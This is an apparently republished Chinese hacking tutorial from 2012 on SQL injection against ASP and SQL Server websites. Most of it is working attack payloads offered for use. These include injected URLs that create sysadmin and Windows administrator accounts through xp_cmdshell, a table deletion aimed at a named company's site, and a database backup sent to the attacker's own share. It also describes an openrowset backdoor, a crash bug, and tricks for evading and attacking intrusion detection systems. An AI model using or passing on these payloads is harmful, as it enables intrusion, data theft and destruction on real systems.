- 掛牌上市企業(yè)
- 60秒人工響應(yīng)
- 99.99%連通率
- 7*24h人工
- 故障100倍補(bǔ)償
SQL Server數(shù)據(jù)庫(kù)的一些攻擊分析 |
| 發(fā)布時(shí)間: 2012/8/8 17:46:32 |
|
SQL數(shù)據(jù)庫(kù)的一些攻擊 對(duì)于國(guó)內(nèi)外的很多新聞,BBS和電子商務(wù)網(wǎng)站都采用ASP+SQL設(shè)計(jì),而寫(xiě) ASP的程序員很多(有很多剛剛畢業(yè)的),所以,ASP+SQL的攻擊成功率 也比較高。這類攻擊方法與NT的版本和SQL的版本沒(méi)有多大的關(guān)系,也沒(méi)有相應(yīng)的補(bǔ)丁,因?yàn)槁┒词浅绦騿T自己造成的,而且大多數(shù)講解ASP編 程的書(shū)上,源代碼例子就有這個(gè)漏洞存在,其實(shí)只是一些合法的ASP對(duì)SQL的請(qǐng)求,就留下后患無(wú)窮! 這種攻擊方法最早源于'or'1'='1的漏洞(我們暫且稱其為漏洞),這個(gè)漏洞的原理我想大家因該都知道了,那么隨之而來(lái)的便是;exec sp_addlogin hax(在數(shù)據(jù)庫(kù)內(nèi)添加一個(gè)hax用戶),但是這個(gè)方法的限制很大,首先ASP使用的SQL Server賬號(hào)是個(gè)管理員,其次請(qǐng)求的提交變 量在整個(gè)SQL語(yǔ)句的最后,因?yàn)橛幸恍┏绦騿T采用SELECT * FROM news WHERE id=... AND topic=... AND ..... 這種方法請(qǐng)求數(shù)據(jù)庫(kù),那么如果還用以上的例子就會(huì) news.asp?id=2;exec sp_addlogin hax 變成SELECT * FROM news WHERE id=2;exec sp_addlogin hax AND topic=... AND ... 整個(gè)SQL語(yǔ)句在執(zhí)行sp_addlogin的存儲(chǔ)過(guò)程后有AND與判斷存在,語(yǔ)法錯(cuò)誤,你的sp_addlogin自然也不能正常運(yùn)行了,因此試試看下面這個(gè)方 法 news.asp?id=2;exec sp_addlogin hax;-- 后面的--符號(hào)把sp_addlogin后的判斷語(yǔ)句變成了注釋,這樣就不會(huì)有語(yǔ)法錯(cuò)誤了,sp_addlogin正常執(zhí)行! 那么我們連一起來(lái)用吧 news.asp?id=2;exec master.dbo.sp_addlogin hax;-- news.asp?id=2;exec master.dbo.sp_password null,hax,hax;-- news.asp?id=2;exec master.dbo.sp_addsrvrolemember sysadmin hax;-- news.asp?id=2;exec master.dbo.xp_cmdshell 'net user hax hax /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';-- news.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators hax /add';-- 這樣,你在他的數(shù)據(jù)庫(kù)和系統(tǒng)內(nèi)都留下了hax管理員賬號(hào)了 當(dāng)然,前提條件是ASP用管理員賬號(hào),所以虛擬空間大家就別試了,不會(huì)存在這個(gè)漏洞的。 以后我們會(huì)討論,如果對(duì)方的ASP不是用SQL管理員賬號(hào),我們?nèi)绾稳肭郑?dāng)然也會(huì)涉及到1433端口的入侵 當(dāng)然大家可以試試看在id=2后面加上一個(gè)'符號(hào),主要看對(duì)方的ASP怎么寫(xiě)了 再說(shuō)說(shuō)當(dāng)ASP程序使用的SQL賬號(hào)不是管理員的時(shí)候我們?cè)撊绾巫觥? 你如天融信的主頁(yè),有新聞內(nèi)容,如下: http://www.talentit.com.cn/news/news-2.asp?newid=117 大家可以試試看http://www.talentit.com.cn/news/news-2.asp?newid=117;select 123;-- 呵呵,報(bào)語(yǔ)法錯(cuò)誤,select 123錯(cuò)誤,顯而易見(jiàn),天融新的ASP在newid變量后面用'號(hào)結(jié)束 那么試試看http://www.talentit.com.cn/news/news-2.asp?newid=117';delete news;-- 哈哈,我想只要表名猜對(duì)了,新聞庫(kù)就被刪了 通常ASP用的SQL賬號(hào)就算不是管理員也會(huì)是某個(gè)數(shù)據(jù)庫(kù)的owner,至少對(duì)于這個(gè)庫(kù)有很高的管理權(quán)限 但是我們不知道庫(kù)名該怎么?看看db_name()函數(shù)吧 打開(kāi)你的query analyzer,看看print db_name() ,呵呵,當(dāng)前的數(shù)據(jù)庫(kù)名就出來(lái)了 以次類推,如下: declare @a sysname;set @a=db_name();backup database @a to disk='你的IP你的共享目錄bak.dat' ,name='test';-- 呵呵,他的當(dāng)前數(shù)據(jù)庫(kù)就備份到你的硬盤(pán)上了,接下來(lái)要做的大家心里都明白了吧 同理這個(gè)方法可以找到對(duì)方的SQL的IP 先裝一個(gè)防火墻,打開(kāi)ICMP和139TCP和445TCP的警告提示 然后試試看news.asp?id=2;exec master.dbo.xp_cmdshell 'ping 你的IP' 如果防火墻提示有人ping你,那么因該可以肯定對(duì)方的ASP用的是SQL的管理員權(quán)限,同時(shí)也確定了對(duì)方的SQL Server的準(zhǔn)確位置,因?yàn)楹芏啻? 一點(diǎn)的網(wǎng)站考慮性能,會(huì)吧web服務(wù)和數(shù)據(jù)庫(kù)分開(kāi),當(dāng)對(duì)方大上了補(bǔ)丁看不到源代碼時(shí),我想只有這個(gè)方法能很快的定位對(duì)方的SQL Server的位 置了 那么,如果對(duì)方ASP沒(méi)有SQL管理員權(quán)限,我們就不能調(diào)用xp_cmdshell了,該怎么辦? 別著急,試試看這個(gè)news.asp?id=2;declare @a;set @a=db_name();backup database @a to disk='你的IP你的共享目錄bak.dat' ,name='test';-- 呵呵,你的防火墻該發(fā)出警告了,有人連接你的445或139(win9端口了,這樣,對(duì)方的SQL的ip一樣也可以暴露 那么如果對(duì)方連某個(gè)數(shù)據(jù)庫(kù)的owner也不是的話,我們?cè)撛趺崔k?下次我會(huì)告訴大家一個(gè)更好的辦法。 其實(shí)backuo database到你的硬盤(pán)還是有點(diǎn)夸張了,如果對(duì)方數(shù)據(jù)庫(kù)很龐大,你又是撥號(hào)上網(wǎng),呵呵,勸你別試了,很難成功傳輸?shù)? 下次我們還會(huì)談到如何騙過(guò)IDS執(zhí)行ASP+SQL入侵 目前有些好的IDS已經(jīng)開(kāi)始監(jiān)視xp_cmdshell這些關(guān)鍵字了 好吧,同志們下次見(jiàn) 所有以上url希望大家通過(guò)vbscript提交,因?yàn)闉g覽器的地址欄會(huì)屏蔽一些特殊字符,這樣你的命令就不能完整傳輸了 window.location.herf=URL 補(bǔ)充:這個(gè)問(wèn)題以前載網(wǎng)上也提出來(lái)過(guò),但是只是一些簡(jiǎn)單的xp_cmdshell調(diào)用限制很大,其實(shí)這里面還有很多值得深入的地方比如 www.guosen.com.cn。國(guó)信證卷就有這個(gè)問(wèn)題,而且他們采用ms的三層結(jié)構(gòu)作的用以前說(shuō)的xp_cmdshell做法就不行了,字符串會(huì)被過(guò)濾,但是 我嘗試了,用sql的異類請(qǐng)求仍然可以在對(duì)方的機(jī)器上開(kāi)啟telnet服務(wù)和administrators組的賬號(hào)!由于對(duì)方防火墻很嚴(yán)checkpoint數(shù)據(jù)報(bào)進(jìn)出 都只開(kāi)放80端口因此,要想獲得他的數(shù)據(jù)庫(kù)結(jié)構(gòu)比較困難了,但是還是有辦法可以做到的:P 順便提醒大家注意一下關(guān)于sqloledb,db_name,openrowset,opendatasource這些系統(tǒng)函數(shù)當(dāng)asp的sqlserver賬號(hào)只是一個(gè)普通用戶時(shí),他們會(huì) 很有用的! sql server新漏洞和一些突破口 下面我要談到一些sqlserver新的bug,雖然本人經(jīng)過(guò)長(zhǎng)時(shí)間的努力,當(dāng)然也有點(diǎn)幸運(yùn)的成分在內(nèi),才得以發(fā)現(xiàn),不敢一個(gè)人獨(dú)享,拿出來(lái)請(qǐng)大家 鑒別,當(dāng)然很有可能有些高手早已知道了,畢竟我接觸sqlserver的時(shí)間不到1年:P 1。關(guān)于openrowset和opendatasource 可能這個(gè)技巧早有人已經(jīng)會(huì)了,就是利用openrowset發(fā)送本地命令 通常我們的用法是(包括MSDN的列子)如下 select * from openrowset('sqloledb','myserver';'sa';'','select * from table') 可見(jiàn)(即使從字面意義上看)openrowset只是作為一個(gè)快捷的遠(yuǎn)程數(shù)據(jù)庫(kù)訪問(wèn),它必須跟在select后面,也就是說(shuō)需要返回一個(gè)recordset 那么我們能不能利用它調(diào)用xp_cmdshell呢?答案是肯定的! select * from openrowset('sqloledb','server';'sa';'','set fmtonly off exec master.dbo.xp_cmdshell ''dir c:\''') 必須加上set fmtonly off用來(lái)屏蔽默認(rèn)的只返回列信息的設(shè)置,這樣xp_cmdshell返回的output集合就會(huì)提交給前面的select顯示,如果采用 默認(rèn)設(shè)置,會(huì)返回空集合導(dǎo)致select出錯(cuò),命令也就無(wú)法執(zhí)行了。 那么如果我們要調(diào)用sp_addlogin呢,他不會(huì)像xp_cmdshell返回任何集合的,我們就不能再依靠fmtonly設(shè)置了,可以如下操作 select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec master.dbo.sp_addlogin Hectic') 這樣,命令至少會(huì)返回select 'OK!'的集合,你的機(jī)器商會(huì)顯示OK!,同時(shí)對(duì)方的數(shù)據(jù)庫(kù)內(nèi)也會(huì)增加一個(gè)Hectic的賬號(hào),也就是說(shuō),我們利用 select 'OK!'的返回集合欺騙了本地的select請(qǐng)求,是命令能夠正常執(zhí)行,通理sp_addsrvrolemember和opendatasource也可以如此操作!至于 這個(gè)方法真正的用處,大家慢慢想吧:P 2。關(guān)于msdasql兩次請(qǐng)求的問(wèn)題 不知道大家有沒(méi)有試過(guò)用msdasql連接遠(yuǎn)程數(shù)據(jù)庫(kù),當(dāng)然這個(gè)api必須是sqlserver的管理員才可以調(diào)用,那么如下 select * from openrowset('msdasql','driver={sql server};server=server;address=server,1433;uid=sa;pwd=;database=master;network=dbmssocn','select * from table1 select * from table2') 當(dāng)table1和table2的字段數(shù)目不相同時(shí),你會(huì)發(fā)現(xiàn)對(duì)方的sqlserver崩潰了,連本地連接都會(huì)失敗,而系統(tǒng)資源占用一切正常,用pskill殺死 sqlserver進(jìn)程后,如果不重啟機(jī)器,sqlserver要么無(wú)法正常啟動(dòng),要么時(shí)常出現(xiàn)非法操作,我也只是碰巧找到這個(gè)bug的,具體原因我還沒(méi)有 摸透,而且很奇怪的是這個(gè)現(xiàn)象只出現(xiàn)在msdasql上,sqloledb就沒(méi)有這個(gè)問(wèn)題,看來(lái)問(wèn)題不是在于請(qǐng)求集合數(shù)目和返回集合數(shù)目不匹配上,因 該還是msdasql本身的問(wèn)題,具體原因,大家一起慢慢研究吧:P 3。可怕的后門(mén) 以前在網(wǎng)上看到有人說(shuō)在sqlserver上留后門(mén)可以通過(guò)添加triger,jobs或改寫(xiě)sp_addlogin和sp_addsrvrolemember做到,這些方法當(dāng)然可行, 但是很容易會(huì)被發(fā)現(xiàn)。不知道大家有沒(méi)有想過(guò)sqloledb的本地連接映射。呵呵,比如你在對(duì)方的sqlserver上用sqlserver的管理員賬號(hào)執(zhí)行如 下的命令 select * from openrowset('sqloledb','trusted_connection=yes;data source=Hectic','set fmtonly off exec master..xp_cmdshell ''dir c:\''') 這樣在對(duì)方的sqlserver上建立了一個(gè)名為Hectic的本地連接映射,只要sqlserver不重啟,這個(gè)映射會(huì)一直存在下去,至少我現(xiàn)在還不知道如 何發(fā)現(xiàn)別人放置的連接映射 ,好了,以上的命令運(yùn)行過(guò)后,你會(huì)發(fā)現(xiàn)哪怕是sqlserver沒(méi)有任何權(quán)限的guest用戶,運(yùn)行以上這條命令也一樣能通過(guò)!而且權(quán)限是 localsystem!(默認(rèn)安裝)呵呵!這個(gè)方法可以用來(lái)在以被入侵過(guò)獲得管理員權(quán)限的sqlserver上留下一個(gè)后門(mén)了。 以上的方法在sqlserver2000+sqlserver2000SP1上通過(guò)! *另外還有一個(gè)猜測(cè),不知道大家有沒(méi)有注意過(guò)windows默認(rèn)附帶的兩個(gè)dsn,一個(gè)是localserver一個(gè)是msqi,這兩個(gè)在建立的時(shí)候是本地管理 員賬號(hào)連接sqlserver的,如果對(duì)方的sqlserver是通過(guò)自定義的power user啟動(dòng),那么sa的權(quán)限就和power user一樣,很難有所大作為,但是 我們通過(guò)如下的命令 select * from openrowset('msdasql','dsn=locaserver;trusted_connection=yes','set fmtonly off exec master..xp_cmdshell ''dir c:\''')應(yīng)該可以利用localserver的管理員賬號(hào)連接本地sqlserver然后再以這個(gè)賬號(hào)的權(quán)限執(zhí)行本地命令了,這是后我想應(yīng)該能突破sa那個(gè) power user權(quán)限了。現(xiàn)在的問(wèn)題是sqloledb無(wú)法調(diào)用dsn連接,而msdasql非管理員不讓調(diào)用,所以我現(xiàn)在正在尋找guest調(diào)用msdasql的方法, 如果有人知道這個(gè)bug如何突破,或有新的想法,我們可以一起討論一下,這個(gè)發(fā)放如果能成功被guest利用,將會(huì)是一個(gè)很嚴(yán)重的安全漏洞。 因?yàn)槲覀兦懊嫣岬降娜魏蝧ql語(yǔ)句都可以提交給對(duì)方的asp去幫我們執(zhí)行:P 利用t-sql騙過(guò)ids或攻擊ids 現(xiàn)在的ids已經(jīng)變得越來(lái)越聰明了 有的ids加入了xp_cmdshell sp_addlogin 的監(jiān)視 但是畢竟人工智能沒(méi)有出現(xiàn)的今天,這種監(jiān)視總是有種騙人的感覺(jué) 先說(shuō)說(shuō)欺騙ids: ids既然監(jiān)視xp_cmdshell關(guān)鍵字,那么我們可以這么做 declare @a sysname set @a="xp_"+"cmdshell" exec @a 'dir c:\' 這個(gè)代碼象性大家都能看明白,還有xp_cmdshell作為一個(gè)store procedure在master庫(kù)內(nèi)有一個(gè)id號(hào),固定的,我們也可以這么做 假設(shè)這個(gè)id=988456 declare @a sysname select @a=name from sysobjects where id=988456 exec @a 'dir c:\' 當(dāng)然也可以 declare @a sysname select @a=name from sysobjects where id=988455+1 exec @a 'dir c:\' 這種做法排列組合,ids根本不可能做的到完全監(jiān)視 同理,sp_addlogin也可以這么做 再說(shuō)說(shuō)攻擊ids: 因?yàn)閕ds數(shù)據(jù)量很大,日至通常備份到常規(guī)數(shù)據(jù)庫(kù),比如sql server 如果用古老的recordset.addnew做法,會(huì)嚴(yán)重影響ids的性能,因?yàn)橥ㄟ^(guò)ado做t-sql請(qǐng)求,不但效率高,而且有一部分工作可以交給sql server 去做 通常程序會(huì)這么寫(xiě) insert table values ('日至內(nèi)容',...) 那么我么想想看,如果用 temp') exec xp_cmdshell 'dir c:\' -- 提交后會(huì)變成 insert table values ('日至內(nèi)容'....'temp') exec xp_cmdshell 'dir c:\' -- ') 這樣,xp_cmdshell就可以在ids的數(shù)據(jù)庫(kù)運(yùn)行了 :) 當(dāng)然ids是一個(gè)嗅嘆器,他會(huì)抓所有的報(bào),而瀏覽器提交的時(shí)候會(huì)把空格變成%20 因此,%20會(huì)被提交到sql server,這樣你的命令就無(wú)法執(zhí)行了 唯一的辦法就是 insert/**/table/**/values('日至內(nèi)容'....'temp')/**/exec/**/xp_cmdshell/**/'dir c:\'/**/-- ') 用/**/代替空格做間隔符,這樣你的t-sql才能在ids的數(shù)據(jù)庫(kù)內(nèi)執(zhí)行 淡然也可以用其他語(yǔ)句,可以破壞,備份ids的數(shù)據(jù)庫(kù)到你的共享目錄 呵呵 其實(shí)這種方法的原理和攻擊asp是一樣的,只是把空格變成了/**/ 本來(lái)asp是select語(yǔ)句,那么用'就可以屏蔽 現(xiàn)在ids用insert語(yǔ)句,那么用')屏蔽 好了,其他很多新的入侵語(yǔ)句大家可以自己慢慢想,最好的測(cè)試工具就是query analyzer《SQL自帶工具》 本文出自:億恩科技【www.ypdoo.com.cn】 服務(wù)器租用/服務(wù)器托管中國(guó)五強(qiáng)!虛擬主機(jī)域名注冊(cè)頂級(jí)提供商!15年品質(zhì)保障!--億恩科技[ENKJ.COM] |
0371-60135900
京公網(wǎng)安備41019702002023號(hào)
香港服務(wù)器租用
美國(guó)服務(wù)器租用
電信骨干機(jī)房
聯(lián)通骨干機(jī)房
